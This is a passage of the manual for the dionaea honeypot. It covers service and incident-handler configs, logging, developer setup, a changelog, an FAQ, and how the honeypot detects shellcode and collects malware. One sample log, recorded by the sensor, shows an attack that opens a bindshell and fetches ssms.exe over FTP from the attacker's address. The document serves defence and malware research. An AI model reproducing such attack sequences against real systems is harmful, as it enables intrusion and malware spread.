1207 on port 69, which can serve files. Even though there were vulnerabili‐
1208 ties in tftp services, I’m yet to see an automated attack on tftp ser‐
1209 vices.
1210 Example config
1212 services/tftp.yaml
1213 - name: tftp
1215 config:
1216 root: /var/lib/dionaea/roots/tftp
1217 UPnP
1220 Example config
1221 services/upnp.yaml
1222 - name: upnp
1224 config:
1225 root: /var/lib/dionaea/roots/upnp
1226 # maximum size in kbytes of the request (32MB)
1227 max_request_size: 32768
1228 personality:
1229 # default
1230 cache: "CACHE-CONTROL: max-age=120\r\n"
1231 st: "ST: upnp:rootdevice\r\n"
1232 usn: "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
1233 server: "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
1234 location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
1235 opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1236 # # Samsung TV
1237 # cache: "CACHE-CONTROL: max-age=900\r\n"
1238 # st: "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1239 # usn: "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1240 # server: "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
1241 # location: "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
1242 # opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1243 #
1244 # # XBOX 360
1245 # cache: "CACHE-CONTROL: max-age=1800\r\n"
1246 # st: "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1247 # usn: "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1248 # server: "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
1249 # location: "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
1250 # opt: "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1251
1254 Getting a copy of the malware is cool, getting an overview of the at‐
1255 tacks run on your sensor is priceless.
1256 dionaea can write information to a text file, but be aware, dionaeas
1258 logging to text files is rather chatty, really chatty, and you do not
1259 want to look at the information, if you are not debugging the software
1260 or writing some new feature for it.
1261 Of course, you can appy filters to the logging, to limit it to differ‐
1263 ent facilities or levels, but in general you do not want to work with
1264 text files.
1265 dionaea uses some internal communication system which is called inci‐
1267 dents. An incident has an origin, which is a string, a path, and prop‐
1268 erties, which can be integers, strings, or a pointer to a connection.
1269 Incidents limit to the max, they pass the information required to inci‐
1270 dent handlers (ihandler). An ihandler can register a path for inci‐
1271 dents he wants to get informed about, the pathes are matched in a glob
1272 like fashion. Therefore logging information using an ihandler is supe‐
1273 rior to text logging, you get the information you are looking for, and
1274 can write it to a format you choose yourself.
1275 List of available ihandlers
1277 emuprofile
1279 Example config
1280 ihandlers/emuprofile.yaml
1281 - name: emuprofile
1283 fail2ban
1286 Example config
1287 ihandlers/fail2ban.yaml
1288 - name: fail2ban
1290 config:
1291 downloads: "/var/lib/dionaea/downloads.f2b"
1292 offers: "/var/lib/dionaea/offers.f2b"
1293 ftp
1296 Example config
1297 ihandlers/ftp.yaml
1298 # ftp client section
1300 - name: ftp
1301 config:
1302 # host for active ftp via NAT
1303 # * 0.0.0.0 - the initiating connection ip is used for active ftp
1304 # * not 0.0.0.0 - gets resolved as hostname and used
1305 active_host: "0.0.0.0"
1306 # ports for active ftp; string indicating a range
1308 active_ports: 63001-64000
1309 hpfeeds
1312 Example config
1313 ihandlers/hpfeeds.yaml
1314 - name: hpfeeds
1316 config:
1317 server: "hpfriends.honeycloud.net"
1318 port: 10000
1319 ident: ""
1320 secret: ""
1321 # dynip_resolve: enable to lookup the sensor ip through a webservice
1322 dynip_resolve: "http://hpfriends.honeycloud.net/ip"
1323 log_db_sql
1326 WARNING:
1327 This ihanlder is experimental.
1328 This incident handler can write interesting information about attacks
1330 and connections into an SQL database. It uses SQLAlchemy to support
1331 different databases.
1332 Example config
1334 ihandlers/log_db_sql.yaml
1335 - name: log_db_sql
1337 config:
1338 url: sqlite:////var/lib/dionaea/dionaea.db
1339 log_incident
1342 This ihandler can be used to export incidents in realtime to be pro‐
1343 cessed by external programs.
1344 WARNING:
1346 This ihandler is in pre alpha state and it might be changed or re‐
1347 moved in the future.
1348 Configure
1350 handlers
1351 List of URLs to submit the information to. At the moment only file,
1352 http and https are supported.
1353 Format
1355 {
1356 "name": "<sensor-name>",
1357 "origin": "<name of the incident>",
1358 "timestamp": "<date in ISO 8601>",
1359 "data": {
1360 "connection": {
1361 "id": <internal ID>,
1362 "local_ip": "<local IP>",
1363 "local_port": <local port>,
1364 "remote_ip": "<remote IP>",
1365 "remote_hostname": "<remote hostname if resolvable>",
1366 "remote_port": <remote port>,
1367 "protocol": "<protocol>",
1368 "transport": "<transport tcp|udp>"
1369 }
1370 }
1371 }
1372 Example config
1374 ihandlers/log_incident.yaml
1375 - name: log_incident
1377 config:
1378 handlers:
1379 #- http://127.0.0.1:8080/
1380 - file:///var/lib/dionaea/dionaea_incident.json
1381 log_json
1384 This ihandler can submit information about attacks/connections encoded
1385 as json.
1386 WARNING:
1388 This ihandler is in pre alpha state and it might be changed or re‐
1389 moved in the near future.
1390 Configure
1392 flat_data
1393 Set to true to flatten object lists.
1394 handlers
1396 List of URLs to submit the information to. At the moment only file,
1397 http and https are supported.
1398 Format
1400 Format of the connection information:
1401 {
1403 "connection": {
1404 "local": {
1405 "address": "<string:local ip address>",
1406 "port": <integer:local port>,
1407 },
1408 "protocol": "<string:service name e.g. httpd>",
1409 "remote": {
1410 "address": "<string:remote ip address>",
1411 "port": <integer:remote port>,
1412 "hostname": "<string:hostname of the remote host>"
1413 },
1414 "transport": "<string:transport protocol e.g. tcp or udp>",
1415 "type": "<string:connection type e.g. accepted, listen, ...>"
1416 }
1417 }
1418 Example config
1420 ihandlers/log_json.yaml
1421 - name: log_json
1423 config:
1424 # Uncomment next line to flatten object lists to work with ELK
1425 # flat_data: true
1426 handlers:
1427 #- http://127.0.0.1:8080/
1428 - file:///var/lib/dionaea/dionaea.json
1429 log_sqlite
1432 WARNING:
1433 This ihandler was renamed in dionaea 0.4.0 from logsql to
1434 log_sqlite.
1435 This is what the logsql python script does, it is an ihandler, and
1437 writes interesting incidents to a sqlite database, one of the benefits
1438 of this logging is the ability to cluster incidents based on the ini‐
1439 tial attack when retrieving the data from the database:
1440 connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
1442 dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
1443 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1444 profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
1445 ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
1446 service: bindshell://1957
1447 connection 611 remoteshell tcp listen 10.69.53.52:1957
1448 connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
1449 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1450 offer: fxp://1:1@10.65.34.231:8218/ssms.exe
1451 download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
1452 connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
1453 connection 614 ftpdata tcp listen 10.69.53.52:62087
1454 connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
1455 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1456 Additionally, you can query the database for many different things, re‐
1458 fer to:
1459 • dionaea sql logging 2009/11/06
1461 • post it yourself 2009/12/08
1463 • sqlite performance 2009/12/12
1465 • virustotal fun 2009/12/14
1467 • Andrew Waite’s Blog for mimic-nepstats.py
1469 for more examples how to make use of the database.
1471 Example config
1473 ihandlers/log_sqlite.yaml
1474 - name: log_sqlite
1476 config:
1477 file: /var/lib/dionaea/dionaea.sqlite
1478 nfq
1482 Example config
1483 ihandlers/nfq.yaml
1484 - name: nfq
1486 # nfq can intercept incoming tcp connections during the tcp handshake
1487 # giving your honeypot the possibility to provide service on
1488 # ports which are not served by default.
1489 # refer to the documentation BEFORE using this
1490 config:
1491 # 0 = DROP
1492 nfaction: 0
1493 throttle:
1494 window : 30
1495 limits:
1496 total: 30
1497 slot: 30
1498 timeouts:
1499 server:
1500 listen: 5
1501 client:
1502 idle: 10
1503 sustain: 240
1504 p0f
1507 Example config
1508 ihandlers/p0f.yaml
1509 - name: p0f
1511 config:
1512 # start p0f with
1513 # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
1514 path: "un:///tmp/p0f.sock"
1515 store
1518 Example config
1519 ihandlers/store.yaml
1520 - name: store
1522 submit_http
1525 Example config
1526 ihandlers/submit_http.yaml
1527 - name: submit_http
1529 config:
1530 # the url to send the submission requests to
1531 url: "http://example.org/"
1532 # E-Mail (optional)
1533 # email: ""
1534 # username (optional)
1535 # user:
1536 # password (optional)
1537 # pass:
1538 submit_http_post
1541 Example config
1542 ihandlers/submit_http_post.yaml
1543 - name: submit_http_post
1545 config:
1546 submit:
1547 file_upload:
1548 urls:
1549 - http://example.org/upload
1550 - http://example.com/file.php
1551 field_values:
1552 submit: "Upload file"
1553 file_fieldname: upload_file
1554 tftp_download
1557 Example config
1558 ihandlers/tftp_download.yaml
1559 - name: tftp_download
1561 VirusTotal
1564 This ihandler submits the captured malware samples to the VirusTotal
1565 service for further analysis.
1566 Configuration
1568 apikey
1569 The VirusTotal API-Key.
1570 file
1572 SQLite database file used to cache the results.
1573 Example config
1575 ihandlers/virustotal.yaml
1576 - name: virustotal
1578 config:
1579 # grab it from your virustotal account at My account -> Inbox -> Public API
1580 apikey: "........."
1581 file: "/var/lib/dionaea/vtcache.sqlite"
1582
1585 Processors control the actions done on the bi-directional streams we
1586 gain when getting attacked, the default is running the emu processor on
1587 them to detect shellcode.
1588 Emu
1590 Use libemu to find and emulate shellcodes.
1591 Configuration
1593 Filter
1594 Only continue with the processing pipeline if all conditions match.
1595 Configuration
1597 protocols
1598 Comma separated list of connection types.
1599 types
1601 Comma separated list of connection types.
1602 • accept - dionaea accepts a new connection from a remote host
1604 • connect - dionaea makes a connection to a remote host
1606 Streamdumper
1608 This processor can dump a connection as bi-directional stream. The
1609 dump can be used to replay an attack on ip-level without messing with
1610 pcap and tcpreplay.
1611 Configuration
1613 path
1614 Dumps will be created in this directory.
1615
1617 First of all, thank you for your interest in contributing to dionaea!
1618 Filing bug reports
1620 Bug reports are very welcome. Please file them on the GitHub issue
1621 tracker. Good bug reports come with extensive descriptions of the er‐
1622 ror and how to reproduce it.
1623 Patches
1625 All patches to dionaea should be submitted in the form of pull requests
1626 to the main dionaea repository, DinoTools/dionaea. These pull requests
1627 should satisfy the following properties:
1628 Code
1630 • The pull request should focus on one particular improvement to dion‐
1631 aea.
1632 • Create different pull requests for unrelated features or bugfixes.
1634 • Python code should follow PEP 8, especially in the “do what code
1636 around you does” sense.
1637 Documentation
1639 When introducing new functionality, please remember to write documenta‐
1640 tion.
1641 Review
1643 Finally, pull requests must be reviewed before merging. Everyone can
1644 perform reviews; this is a very valuable way to contribute, and is
1645 highly encouraged.
1646
1648 dionaea initial development was funded by the Honeynet Project as part
1649 of the Honeynets Summer of Code during 2009. The development process
1650 is as open as possible. You can browse the source online and report
1651 bugs on GitHub
1652 Development
1654 Vagrant
1655 Vagrant can be used to setup a development environment for dionaea
1656 within minutes.
1657 Install
1659 First install Vagrant and VirtualBox.
1660 If everything has been setup correctly clone the git repository and use
1662 vagrant to bootstrap and start the environment.
1663 $ git clone https://github.com/DinoTools/dionaea.git
1665 $ cd dionaea/vagrant
1666 $ vagrant up
1667 All files will be installed in the /opt/dionaea directory.
1669 Run
1671 Access the development environment, edit the config files and start
1672 dionaea with the following command.
1673 $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1675 Rebuild and test
1677 To rebuild and install dionaea run the flowing commands.
1678 $ cd /vagrant
1680 $ make
1681 $ sudo make install
1682 See Run for more information on how to start dionaea.
1684 Ubuntu 14.04
1686 Instead of using Vagrant you can use a Ubuntu 14.04 system to setup
1687 your development environment. In this section we will use the scripts
1688 used to setup the Vagrant environment to bootstrap a fresh Ubuntu sys‐
1689 tem. If you like you can follow the ../installation ‘From Source’
1690 guide to setup everything by hand.
1691 Install
1693 First install Ubuntu.
1694 If everything has been setup correctly clone the git repository and run
1696 the bootstrap script.
1697 $ git clone https://github.com/DinoTools/dionaea.git
1699 $ vagrant
1700 $ ./bootstrap.sh
1701 All files will be installed in the /opt/dionaea directory.
1703 Rebuild and test
1705 Rebuild, install and start dionaea from the root of the git repository.
1706 $ make
1708 $ sudo make install
1709 $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1710 This can also be done in one line.
1712 $ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1714 Find memory leaks
1716 To enable AddressSanitizer you have to add the following parameters to
1717 the configure script and rebuild dionaea.
1718 --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"
1720 When running dionaea it will print information about overfow errors.
1722 If you would like to stop execution you have to export an additional
1723 environment variable.
1724 export ASAN_OPTIONS='abort_on_error=1'
1726 To get a stacktrace you can use gdb and add an additional breakpoint
1728 break __asan_report_error.
1729 It is also possible to use asan_symbolize.py python2 script to extract
1731 additional information.
1732 /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg 2>&1 | python asan_symbolize.py
1734 Logging
1736 Logging should be used to report errors and for debugging purposes. It
1737 must not be used to report attacks. Incidents should be used for this
1738 purpose. For more information have a look at the ihandler section.
1739 Comparison glib2 and Python
1741 ┌─────────┬──────────┐
1743 │glib2 │ Python │
1744 ├─────────┼──────────┤
1745 │debug │ debug │
1746 ├─────────┼──────────┤
1747 │info │ info │
1748 ├─────────┼──────────┤
1749 │warning │ warning │
1750 ├─────────┼──────────┤
1751 │critical │ error │
1752 ├─────────┼──────────┤
1753 │error │ critical │
1754 └─────────┴──────────┘
1755 WARNING:
1757 In glib2 a critical message means critical warning. But in Python a
1758 critical message is handled as critical error.
1759 WARNING:
1761 An error message in glib2 or a critical message in a Python module
1762 will terminate the program immediately.
1763 Incident
1765 Some of the incidents reported by the dionaea core are listed below.
1766 dionaea.connection.tcp.accept:
1768 A new TCP connection has been accepted by dionaea.
1769 dionaea.connection.tls.accept:
1771 A new SSL/TLS connection has been accepted by dionaea.
1772 dionaea.connection.tcp.connect:
1774 Reporte after dionaea has connection to an external service via TCP.
1775 dionaea.connection.tls.connect:
1777 Reporte after dionaea has connection to an external service via
1778 SSL/TLS.
1779 dionaea.connection.udp.connect:
1781 Reporte after dionaea has connection to an external service via UDP.
1782 dionaea.connection.free:
1784 A connection has been closed and freed.
1785 dionaea.connection.tcp.listen:
1787 Fired after a TCP service has been bound and is listening for incom‐
1788 ming connections.
1789 dionaea.connection.tls.listen:
1791 Fired after a SSL/TLS service has been bound and is listening for
1792 incomming connections.
1793 dionaea.connection.tcp.pending:
1795 dionaea.connection.tcp.reject:
1797 A incoming connection has been rejected by the server.
1798 dionaea.connection.link.early:
1800 dionaea.connection.link:
1802 Reported to give the log management the chance to link two connec‐
1803 tions.
1804
1806 0.8.0 - (master)
1807 0.7.0 - (2018-05-01)
1808 build
1809 • Add initial cmake support
1811 ci
1813 • Add Debian 9
1815 dionaea
1817 • Fix build error with OpenSSL 1.1.0
1819 • Improve OpenSSL 1.1.0 support
1821 • Cleanup connection code
1823 • Enable bistream for SSL/TLS connections (Thanks Aws0mus)
1825 • Fixing chroot bugs (Thanks Michal Ambroz)
1827 doc
1829 • Add additional information
1831 • Doxygen config file for dionaea c core
1833 • Ubuntu 16.04 install instructions
1835 package
1837 • Remove old and deprecated debian package config
1839 python
1841 • Fix typo in config key
1843 • Fix hardcoded python path
1845 • Fix compilation on CentOS7 (Thanks Michal Ambroz)
1847 python/http
1849 • Initial support to handle SOAP requests
1851 python/log_incident
1853 • Improve hash generator
1855 • Fix bug if parent is unknown
1857 • Remove IDs from list if processed
1859 python/mongo
1861 • Initial support to simulate a MongoDB server
1863 python/pyev
1865 • Update from 0.8 to 0.9 to support Python >= 3.6
1867 python/smb
1869 • Add support for WannaCry and SambaCry (Big thanks to gento)
1871 • Add additional config options to change identity
1873 python/util
1875 • Find Download commands for Linux shell
1877 0.6.0 - (2016-11-14)
1879 dionaea
1880 • Fix build for musl lib
1882 doc
1884 • Fix install instructions
1886 • Extend README.md
1888 python/blackhole
1890 • New service/Initial version
1892 python/emu_scripts
1894 • New handler to analyse downloaded scripts
1896 • Detect VBScript and PowerShell
1898 • Limit number of subdownloads
1900 python/http
1902 • Clean up
1904 • Use state vars instead of strings
1906 • Add template support * Jinja 2 template engine * nginx template
1908 python/mysql
1910 • Dump files from SELECT queries
1912 • Extract URLs from functions
1914 • Variable handler
1916 • Support for selecting variables
1918 python/p0f
1920 • Fix decode error
1922 python/pptp
1924 • Fix error if config is empty
1926 0.5.1 - 2016-09-05
1928 dionaea
1929 • Don’t report ‘connection.free’ incident to early to prevent segmenta‐
1931 tion faults
1932 0.5.0 - 2016-08-06
1934 dionaea
1935 • Handle byte objects in incidents
1937 • Bump required Python version from 3.2 to 3.4
1939 python/http
1941 • Detect Shellshock attacks
1943 python/log_incident
1945 • Initial support to export raw incident information
1947 python/log_sqlite
1949 • Log credentials from the ftp service
1951 python/memcache
1953 • Initial support for the memcached protocol
1955 python/pptp
1957 • Clean up
1959 • Handle CallClearRequests packets
1961 • Values for hostname, vendor name and firmware revision are now cus‐
1963 tomizable
1964 python/util
1966 • New function to detect shellshock attacks and report detected URLs
1968 0.4.2 - 2016-07-02
1970 doc
1971 • Add information about log levels for developers
1973 python/*
1975 • Replace all critical log messages with error messages
1977 • Catch exceptions in handle_io_in() and handle_io_out() to improve
1979 stability
1980 • Catch exceptions in incident handlers
1982 python/sip
1984 • Fix error while reading config values
1986 python/upnp
1988 • Fix errors in log messages
1990 more
1992 • Add templates to create issues and merge requests on github
1994 0.4.1 - 2016-06-14
1996 core
1997 • Initialize stdout logger earlier
1999 • Log error,critical and warning by default
2001 python/*
2003 • In glib2 critical is a critical warning
2005 • Add support for exceptions
2007 • Check file path and show warnings
2009 python/log_json
2011 • Add support for flat object lists to work with ELK stack
2013 0.4.0 - 2016-05-31
2015 core
2016 • Replace lcfg with Key-value file parser from glib
2018 ci
2020 • Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8
2022 doc
2024 • Add initial documentation for missing modules
2026 • Update documentation to reflact config changes
2028 • Add processor documentation
2030 python/*
2032 • Replace lcfg with yaml configs
2034 • Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
2036 • Rename incident handlers from logsql to log_sqlite
2038 • Rename incident handlers from uniqdownload to submit_http_post
2040 python/mysql
2042 • Enable processor pipeline
2044 0.3.0 - 2016-03-30
2046 core
2047 • Code clean up (Thanks to Katarina)
2049 • Vagrant based dev environment
2051 • Customize ssl/tls parameters for autogenerated certificates
2053 doc
2055 • Initial version of sphinx based documentation
2057 python/ftp
2059 • Support to customize response messages
2061 • Small fixes
2063 python/hpfeeds
2065 • Initial ihandler support (Thanks to rep)
2067 python/http
2069 • Customize HTTP response headers
2071 • Return HTTP/1.1 instead of HTTP/1.0
2073 python/log_json
2075 • Initial ihandler support
2077 python/mqtt
2079 • Initial protocol support (Thanks to gento)
2081 python/pptp
2083 • Initial protocol support (Thanks to gento)
2085 python/upnp
2087 • Initial protocol support (Thanks to gento)
2089 0.2.1 - 2014-07-16
2091 core
2092 • Support for cython and cython3
2094 • Fixes to build with glib 2.40
2096 • Remove build warnings
2098 • Support libnl >= 3.2.21
2100 python/http
2102 • Fix unlink() calls
2104 python/virustotal
2106 • virustotal API v2.0
2108 0.2.0 - 2013-11-02
2110 Last commit by original authors.
2111 0.1.0
2113 • Initial release.
2114
2116 WARNING:
2117 The documentation is work in progress.
2118 Build/Install
2120 I get gcc: command not found?
2121 install gcc..
2122 How to uninstall it?
2124 rm -rf /opt/dionaea
2125 I get binding.pyx:…: undeclared name not builtin: bytes during the
2127 python modules build.
2128 Install a recent cython version
2129 I get Python.h not found during compiling cython
2131 Install appropriate headers for your python interpreter
2132 I do not use ubuntu/debian and the instructions are useless for me
2134 therefore.
2135 I use debian/ubuntu, and therefore I can only provide instructions
2136 for debian/ubuntu, but you are free to send me a diff for your oper‐
2137 ating system
2138 I use Redhat/Centos 5 and the installation is frustrating and a mess as
2140 nothing works.
2141 Thats right, but I did not choose your operating system. Here is a
2142 list of outdated or missing packages for your choosen distribution:
2143 all. Yes, you’ll even have to install glib (you’ll have 2.10 where
2144 2.20 is required) from source. Getting python3 compiled with a re‐
2145 cent sqlite3 version installed to /opt/dionaea requires editing the
2146 setup.py file (patch <http://p.carnivore.it/KDIFWt>). /I experi‐
2147 enced this wonderful operating system myself … You really have to
2148 love your distro to stick with it, even if it ships software ver‐
2149 sions your grandma saw released in her youth. Centos is the best
2150 distro … to change distros. No matter what you choose, it can’t get
2151 worse./
2152 Unable to build.
2154 ==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
2156 ==> default: cp:
2157 ==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory
2158 ==> default: libtool: Version mismatch error. This is libtool 2.4.6 Debian-2.4.6-2, but the
2160 ==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
2161 ==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
2162 ==> default: libtool: and run autoconf again.
2163 Try to clean your build environment.
2165 WARNING:
2167 This will remove all ignored and untracked files from the direc‐
2168 tory. Use –dry-run
2169 git clean -xdf
2171 Run
2173 I get OperationalError at unable to open database file when using
2174 logsqlite and it does not work at all
2175 Read the logsql instructions <#logsql>
2176 I get a Segmentation Fault
2178 Read the segfault instructions <#segfault>
2179 I logrotate, and after logrotate dionaea does not log anymore.
2181 Read the logrotate instructions <#logging>
2182 p0f does not work.
2184 Make sure your have p0f 2.0.8 and dionaea does not listen on ::, p0f
2185 can’t deal with IPv6.
2186 I’m facing a bug, it fails, and I can’t figure out why.
2188 Explain the problem, if I’m interested in the nature of the problem,
2189 as it does not sound like pebcak, I may ask for a shell/screen and
2190 have a look myself, and if it is worth it, you’ll even get a FAQ en‐
2191 try for some specialties of your OS.
2192 Unable to bind to port after dropping privileges
2194 Dropping privileges and binding to ports lower than 1024 is only
2195 support on Linux systems. If some of the optional build dependen‐
2196 cies are missing dionaea might not be able to bind to these ports
2197 too. After enabling all log levels it should display some log mes‐
2198 sages like in the example below.
2199 [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2201 [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2202 [10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
2203 To fix this issue you have to install the kernel headers for your
2205 kernel and rebuild dionaea. If everything works as it should you
2206 might get log messages like in the example below. You might have
2207 noticed that there is now a pchild section. This means dionaea is
2208 using a child process with extended privileges to bind to the port.
2209 [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2211 [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2212 [10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
2213 [10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
2214 [10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
2215
2217 WARNING:
2218 The documentation is work in progress.
2219 Rotate bistream files
2221 Dionaea does not have and may never will have a function/option to ro‐
2222 tate the bistream files. But you can do this by using a cron job and a
2223 simple shell script.
2224 Feel free to use and modify the script below.
2226 #!/bin/bash
2228 # Compress bistream files older than 2 days
2230 find /var/lib/dionaea/bistreams/* -type f -mtime +2 -exec gzip {} \;
2231 # Clear bistream logs from dionaea every week
2233 find /var/lib/dionaea/bistreams/* -type f -mtime +7 -exec rm {} \;
2234 find /var/lib/dionaea/bistreams/* -type d -empty -delete
2235
2237 Cui honorem, honorem
2238 Google:
2239 Google has supported 3 students to work on dionaea during GSoc 2009,
2240 GSoc 2010 and GSoc 2011.
2241 SURFnet:
2243 SURFnet has supported the project in the past(2010?-2014?). Working
2244 with SURFnet is a real pleasure.
2245 Support
2247 If you are getting frustrated, because things to not work for you and
2248 you already read the faq, join the ml and share your experience, or the
2249 chat.
2250 GitHub
2252 Use the issue tracker to report any problem.
2253 Website: Issue tracker
2255 IRC
2257 From time to time some of the developers join the #nepenthes channel
2258 on freenode. irc://irc.freenode.org/nepenthes
2259 Mailing List:
2261 Only a few messages every year. Seems to be dead, no message since
2262 2015.
2263 Website: Mailinglist nepenthes-devel
2265 Links
2267 • GSoC 2009 Project #10 http://honeynet.org/gsoc/project10
2268 • The Honeynet Project
2270 Old documentation:
2272
2274 Attackers do not seek your service, attackers want to exploit you,
2275 they’ll chat with the service for some packets, and afterwards sent a
2276 payload. dionaea has to detect and evaluate the payload to be able to
2277 gain a copy of the malware. In order to do so, dionaea uses libemu.
2278 Given certain circumstances, libemu can detect shellcode, measure the
2280 shellcode, and if required even execute the shellcode. Shellcode detec‐
2281 tion is done by making use of GetPC heuristics, others wrote papers
2282 about it, we decided to write libemu to do so. This detection is rather
2283 time consuming, and therefore done using threads.
2284 The part of dionaea which takes care of the network io can create a
2286 copy of all in/output run for a connection, this copy is passed to the
2287 detection facility, which is a tree of detection facilities, at this
2288 moment there is only a single leaf, the emu plugin. The emu plugin uses
2289 threads and libemu to detect and profile/measure shellcode.
2290 Shellcode measurement/profiling is done by running the shellcode in the
2292 libemu vm and recording API calls and arguments. For most shellcode
2293 profiling is sufficient, the recorded API calls and arguments reveal
2294 enough information to get an idea of the attackers intention and act
2295 upon them. For multi-stage shellcode, where the first exploitation
2296 stage of the shellcode would retrieve a second shellcode from the at‐
2297 tacker, profiling is not sufficient, as we lack the information ‘what
2298 to do’ from the second stage of the shellcode, in this case we need to
2299 make use of shellcode execution. Shellcode execution is basically the
2300 same as shellcode profiling, the only difference is not recording the
2301 api calls, and we allow the shellcode to take certain actions, for ex‐
2302 ample creating a network connection.
2303 Payloads
2305 Once we have the payload, and the profile, dionaea has to guess the in‐
2306 tention, and act upon it
2307 Shells - bind/connectback
2309 This payload offers a shell (cmd.exe prompt) to the attacker, either by
2310 binding a port and waiting for the attacker to connect to us again, or
2311 by connection to the attacker. In both cases, dionaea offers an cmd.exe
2312 emulation to the attacker, parses the input, and acts upon the input,
2313 usually the instructions download a file via ftp or tftp.
2314 URLDownloadToFile
2316 These shellcodes use the URLDownloadToFile api call to retrieve a file
2317 via http, and execute the retrieved file afterwards
2318 Exec
2320 Making use of WinExec, these shellcode execute a single command which
2321 has to be parsed and processed like the bind/connectback shell shell‐
2322 commands.
2323 Multi Stage Payloads
2325 We never know what the second stage is, therefore libemu is used to ex‐
2326 ecute the shellcode in the libemu vm.
2327
2329 Once dionaea gained the location of the file the attacker wants it to
2330 downloads from the shellcode, dionaea will try to download the file.
2331 The protocol to downloads files via tftp and ftp is implemented in
2332 python (ftp.py and tftp.py) as part of dionaea, downloading files via
2333 http is done in the curl module - which makes use of libcurl’s awsome
2334 http capabilities. Of course libcurl can run downloads for ftp too, but
2335 the ftp services embedded in malware a designed to work with windows
2336 ftp.exe client, and fail for others.
2337
2339 Once dionaea got a copy of the worm attacking her, we may want to store
2340 the file locally for further analysis, or submit the file to some 3rd
2341 party for further analysis.
2342 dionaea can http/POST the file to several services like CWSandbox, Nor‐
2344 man Sandbox or VirusTotal.
2345
2347 If you want to change the software, it is really important to under‐
2348 stand how it works, therefore please take the time to how it works.
2349 dionaea.conf is the main configuration file, the file controls consists
2350 of sections for:
2351 • logging
2353 • processors
2355 • downloads
2357 • bistreams
2359 • submit
2361 • listen
2363 • modules
2365 logging
2367 The logging section controls … logging, you can specify log domains and
2368 loglevel for different logfiles. As dionaea is pretty … verbose, it is
2369 useful to rotate the logfiles using logrotate.
2370 # logrotate requires dionaea to be started with a pidfile
2372 # in this case -p /opt/dionaea/var/run/dionaea.pid
2373 # adjust the path to your needs
2374 /opt/dionaea/var/log/dionaea*.log {
2375 notifempty
2376 missingok
2377 rotate 28
2378 daily
2379 delaycompress
2380 compress
2381 create 660 root root
2382 dateext
2383 postrotate
2384 kill -HUP `cat /opt/dionaea/var/run/dionaea.pid`
2385 endscript
2386 }
2387 //etc/logrotate.d/dionaea/
2389 modules
2391 downloads specify where to store downloaded malware. bistreams specify
2392 where to store bi-directional streams, these are pretty useful when de‐
2393 bugging, as they allow to replay an attack on ip-level, without messing
2394 with pcap&tcpreplay, which never worked for me. submit specifies where
2395 to send files to via http or ftp, you can define a new section within
2396 submit if you want to add your own service. listen sets the addresses
2397 dionaea will listen to. The default is all addresses it can find, this
2398 mode is call getifaddrs, but you can set it to manual and specify a
2399 single address if you want to limit it. modules is the most powerfull
2400 section, as it specifies the modules to load, and the options for each
2401 module.
2402 logsql
2404 This section controls the logging to the sqlite database. logsql does
2405 not work when chrooting - python makes the path absolute and fails for
2406 requests after chroot().
